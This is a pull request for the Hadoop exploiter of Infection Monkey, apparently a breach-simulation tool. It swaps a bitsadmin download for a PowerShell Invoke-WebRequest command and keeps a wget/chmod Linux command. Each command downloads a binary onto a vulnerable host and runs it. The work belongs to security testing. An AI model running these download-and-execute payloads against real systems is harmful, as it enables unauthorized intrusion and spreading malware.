### PR TITLE
Hadoop windows fixed to be more reliable

### DIFF
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -29,9 +29,18 @@ class HadoopExploiter(WebRCE):
                     "&& wget -O %(monkey_path)s %(http_path)s " \
                     "; chmod +x %(monkey_path)s " \
                     "&&  %(monkey_path)s %(monkey_type)s %(parameters)s"
+
+    """ Command was observed to be unreliable, we use powershell instead
     WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
                       " Update /download /priority high %(http_path)s %(monkey_path)s " \
                       "& %(monkey_path)s %(monkey_type)s %(parameters)s"
+    """
+
+    WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \
+                      "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \
+                      " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \
+                      "{& %(monkey_path)s %(monkey_type)s %(parameters)s }  \""
+
     # How long we have our http server open for downloads in seconds
     DOWNLOAD_TIMEOUT = 60
     # Random string's length that's used for creating unique app name
@@ -46,6 +55,9 @@ class HadoopExploiter(WebRCE):
         self.add_vulnerable_urls(urls, True)
         if not self.vulnerable_urls:
             return False
+        # We can only upload 64bit version to windows for various reasons
+        if self.host.os['type'] == 'windows':
+            self.host.os['machine'] = '64'
         paths = self.get_monkey_paths()
         if not paths:
             return False

--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -55,7 +55,7 @@ class HadoopExploiter(WebRCE):
         self.add_vulnerable_urls(urls, True)
         if not self.vulnerable_urls:
             return False
-        # We can only upload 64bit version to windows for various reasons
+        # We assume hadoop is ran only on 64 bit windows
         if self.host.os['type'] == 'windows':
             self.host.os['machine'] = '64'
         paths = self.get_monkey_paths()

--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -12,7 +12,7 @@ import posixpath
 
 from infection_monkey.exploit.web_rce import WebRCE
 from infection_monkey.exploit.tools import HTTPTools, build_monkey_commandline, get_monkey_depth
-from infection_monkey.model import MONKEY_ARG, ID_STRING
+from infection_monkey.model import MONKEY_ARG, ID_STRING, HADOOP_WINDOWS_COMMAND, HADOOP_LINUX_COMMAND
 
 __author__ = 'VakarisZ'
 
@@ -22,25 +22,6 @@ LOG = logging.getLogger(__name__)
 class HadoopExploiter(WebRCE):
     _TARGET_OS_TYPE = ['linux', 'windows']
     HADOOP_PORTS = [["8088", False]]
-
-    # We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes
-    # to download monkey at the same time
-    LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
-                    "&& wget -O %(monkey_path)s %(http_path)s " \
-                    "; chmod +x %(monkey_path)s " \
-                    "&&  %(monkey_path)s %(monkey_type)s %(parameters)s"
-
-    """ Command was observed to be unreliable, we use powershell instead
-    WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
-                      " Update /download /priority high %(http_path)s %(monkey_path)s " \
-                      "& %(monkey_path)s %(monkey_type)s %(parameters)s"
-    """
-
-    WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \
-                      "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \
-                      " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \
-                      "{& %(monkey_path)s %(monkey_type)s %(parameters)s }  \""
-
     # How long we have our http server open for downloads in seconds
     DOWNLOAD_TIMEOUT = 60
     # Random string's length that's used for creating unique app name
@@ -55,9 +36,6 @@ class HadoopExploiter(WebRCE):
         self.add_vulnerable_urls(urls, True)
         if not self.vulnerable_urls:
             return False
-        # We assume hadoop is ran only on 64 bit windows
-        if self.host.os['type'] == 'windows':
-            self.host.os['machine'] = '64'
         paths = self.get_monkey_paths()
         if not paths:
             return False
@@ -91,9 +69,9 @@ class HadoopExploiter(WebRCE):
         # Build command to execute
         monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
         if 'linux' in self.host.os['type']:
-            base_command = self.LINUX_COMMAND
+            base_command = HADOOP_LINUX_COMMAND
         else:
-            base_command = self.WINDOWS_COMMAND
+            base_command = HADOOP_WINDOWS_COMMAND
 
         return base_command % {"monkey_path": path, "http_path": http_path,
                                "monkey_type": MONKEY_ARG, "parameters": monkey_cmd}

--- a/monkey/infection_monkey/model/__init__.py
+++ b/monkey/infection_monkey/model/__init__.py
@@ -28,4 +28,14 @@ CHECK_COMMAND = "echo %s" % ID_STRING
 GET_ARCH_WINDOWS = "wmic os get osarchitecture"
 GET_ARCH_LINUX = "lscpu"
 
+# All in one commands (upload, change permissions, run)
+HADOOP_WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \
+                      "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \
+                      " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \
+                      "{& %(monkey_path)s %(monkey_type)s %(parameters)s }  \""
+HADOOP_LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
+                    "&& wget -O %(monkey_path)s %(http_path)s " \
+                    "; chmod +x %(monkey_path)s " \
+                    "&&  %(monkey_path)s %(monkey_type)s %(parameters)s"
+
 DOWNLOAD_TIMEOUT = 300


### PR DESCRIPTION
# Feature / Fixes
> Hadoop windows now uploads and executes on 64 bit windows.

##  Changes
MonkeyZoo tests showed that:
1. Bits admin command doesn't work in hadoop environment.
2. Hadoop runs as a job. It means that if we upload monkey32 this happens:
    A. monkey32 spawns monkey64
    B. monkey64 starts execution
    C. monkey32 shuts down
    D. all monkey32 children processes gets terminated (in this case monkey64 is killed mid-execution)
For these reasons upload command was changed to powershell and only monkey64.exe is used in exploitation process.
